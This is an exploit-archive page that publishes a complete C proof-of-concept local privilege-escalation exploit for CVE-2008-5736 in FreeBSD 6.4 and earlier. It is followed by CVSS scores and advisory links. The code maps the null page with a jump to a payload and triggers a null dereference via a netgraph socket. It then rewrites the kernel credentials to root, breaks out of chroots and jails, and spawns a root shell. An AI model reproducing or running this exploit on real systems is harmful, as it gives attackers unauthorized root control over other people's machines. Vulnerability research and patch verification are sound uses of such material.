FreeBSD <= 6.4 Netgraph Local Privledge Escalation Exploit

2011.03.11
Credit: zx2c4
Risk: High
Local: Yes
Remote: No
CWE: CWE-noinfo


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

/* * FreeBSD <= 6.4-RELEASE Netgraph Exploit * by zx2c4 * * * This is an exploit for CVE-2008-5736, the FreeBSD protosw * and loosely based on Don Bailey's 2008 exploit - * http://www.exploit-db.com/exploits/7581/ . The thing with * Don's exploit is that it relies on having a known location * of allproc, which means having access to the kernel or * debugging symbols, either of which might not be available. * Initial attempts included a general memory search for some * characteristics of allproc, but this was difficult to make * reliable. This solution here is a much more standard - get * the current thread, change its permissions, and execl to * shell. Additionally, it breaks out of chroots and freebsd * jails by reparenting to pid 1 and copying its fds. * * This reliably works on kernels on or below 6.4-RELEASE: * * $ gcc a.c * $ ./a.out * ~ FreeBSD <= 6.4-RELEASE Netgraph Exploit ~ * ~~~~~~~~~~~~~~~~~ by zx2c4 ~~~~~~~~~~~~~~~~ * ~~~~~ greetz to don bailey, edemveiss ~~~~~ * * [+] mmapping null page * [+] adding jmp to pwnage in null page * [+] opening netgraph socket * [+] triggering null dereference * [+] elevating permissions * [+] got root! * # * * It's an oldie, but simple enough that someone needed * to write another PoC exploit at some point. * * cheers, * zx2c4, 27-2-2011 * */ #define _KERNEL #include <sys/types.h> #include <sys/time.h> #include <sys/param.h> #include <sys/proc.h> #include <sys/ucred.h> #include <sys/mman.h> #include <sys/socket.h> #include <sys/stat.h> #include <sys/filedesc.h> #include <sys/queue.h> #include <netgraph/ng_socket.h> #include <stdio.h> #include <fcntl.h> #include <unistd.h> #define PAGES 1 volatile int got_root = 0; int root(void) { struct thread *thread; asm( "movl %%fs:0, %0" : "=r"(thread) ); thread->td_critnest = 0; thread->td_proc->p_ucred->cr_uid = 0; thread->td_proc->p_ucred->cr_prison = NULL; struct proc *parent = thread->td_proc; while (parent->p_pptr && parent->p_pid != 1) parent = parent->p_pptr; thread->td_proc->p_fd->fd_rdir = parent->p_fd->fd_rdir; thread->td_proc->p_fd->fd_jdir = parent->p_fd->fd_jdir; thread->td_proc->p_fd->fd_cdir = parent->p_fd->fd_cdir; thread->td_proc->p_pptr = parent; got_root = 1; return 0; } int main(int argc, char *argv[]) { printf("~ FreeBSD <= 6.4-RELEASE Netgraph Exploit ~\n"); printf("~~~~~~~~~~~~~~~~~ by zx2c4 ~~~~~~~~~~~~~~~~\n"); printf("~~~~~ greetz to don bailey, edemveiss ~~~~~\n\n"); printf("[+] mmapping null page\n"); if (mmap(NULL, PAGES * PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_FIXED, -1, 0) < 0) { perror("[-] mmap failed"); return -1; } printf("[+] adding jmp to pwnage in null page\n"); *(char*)0x0 = 0x90; *(char*)0x1 = 0xe9; *(unsigned long*)0x2 = (unsigned long)&root; printf("[+] opening netgraph socket\n"); int s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA); if (s < 0) { perror("[-] failed to open netgraph socket"); return -1; } printf("[+] triggering null dereference\n"); shutdown(s, SHUT_RDWR); if (!got_root) { printf("[-] failed to trigger pwnage\n"); return -1; } printf("[+] elevating permissions\n"); setuid(0); setgid(0); if (getuid() != 0) { printf("[-] failed to get root\n"); return -1; } printf("[+] got root!\n"); execl("/bin/sh", "sh", NULL); return 0; }

References:

http://xforce.iss.net/xforce/xfdb/47570
http://www.securitytracker.com/id?1021491
http://www.securityfocus.com/bid/32976
http://www.milw0rm.com/exploits/7581
http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc
http://secunia.com/advisories/33209
http://osvdb.org/50936


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top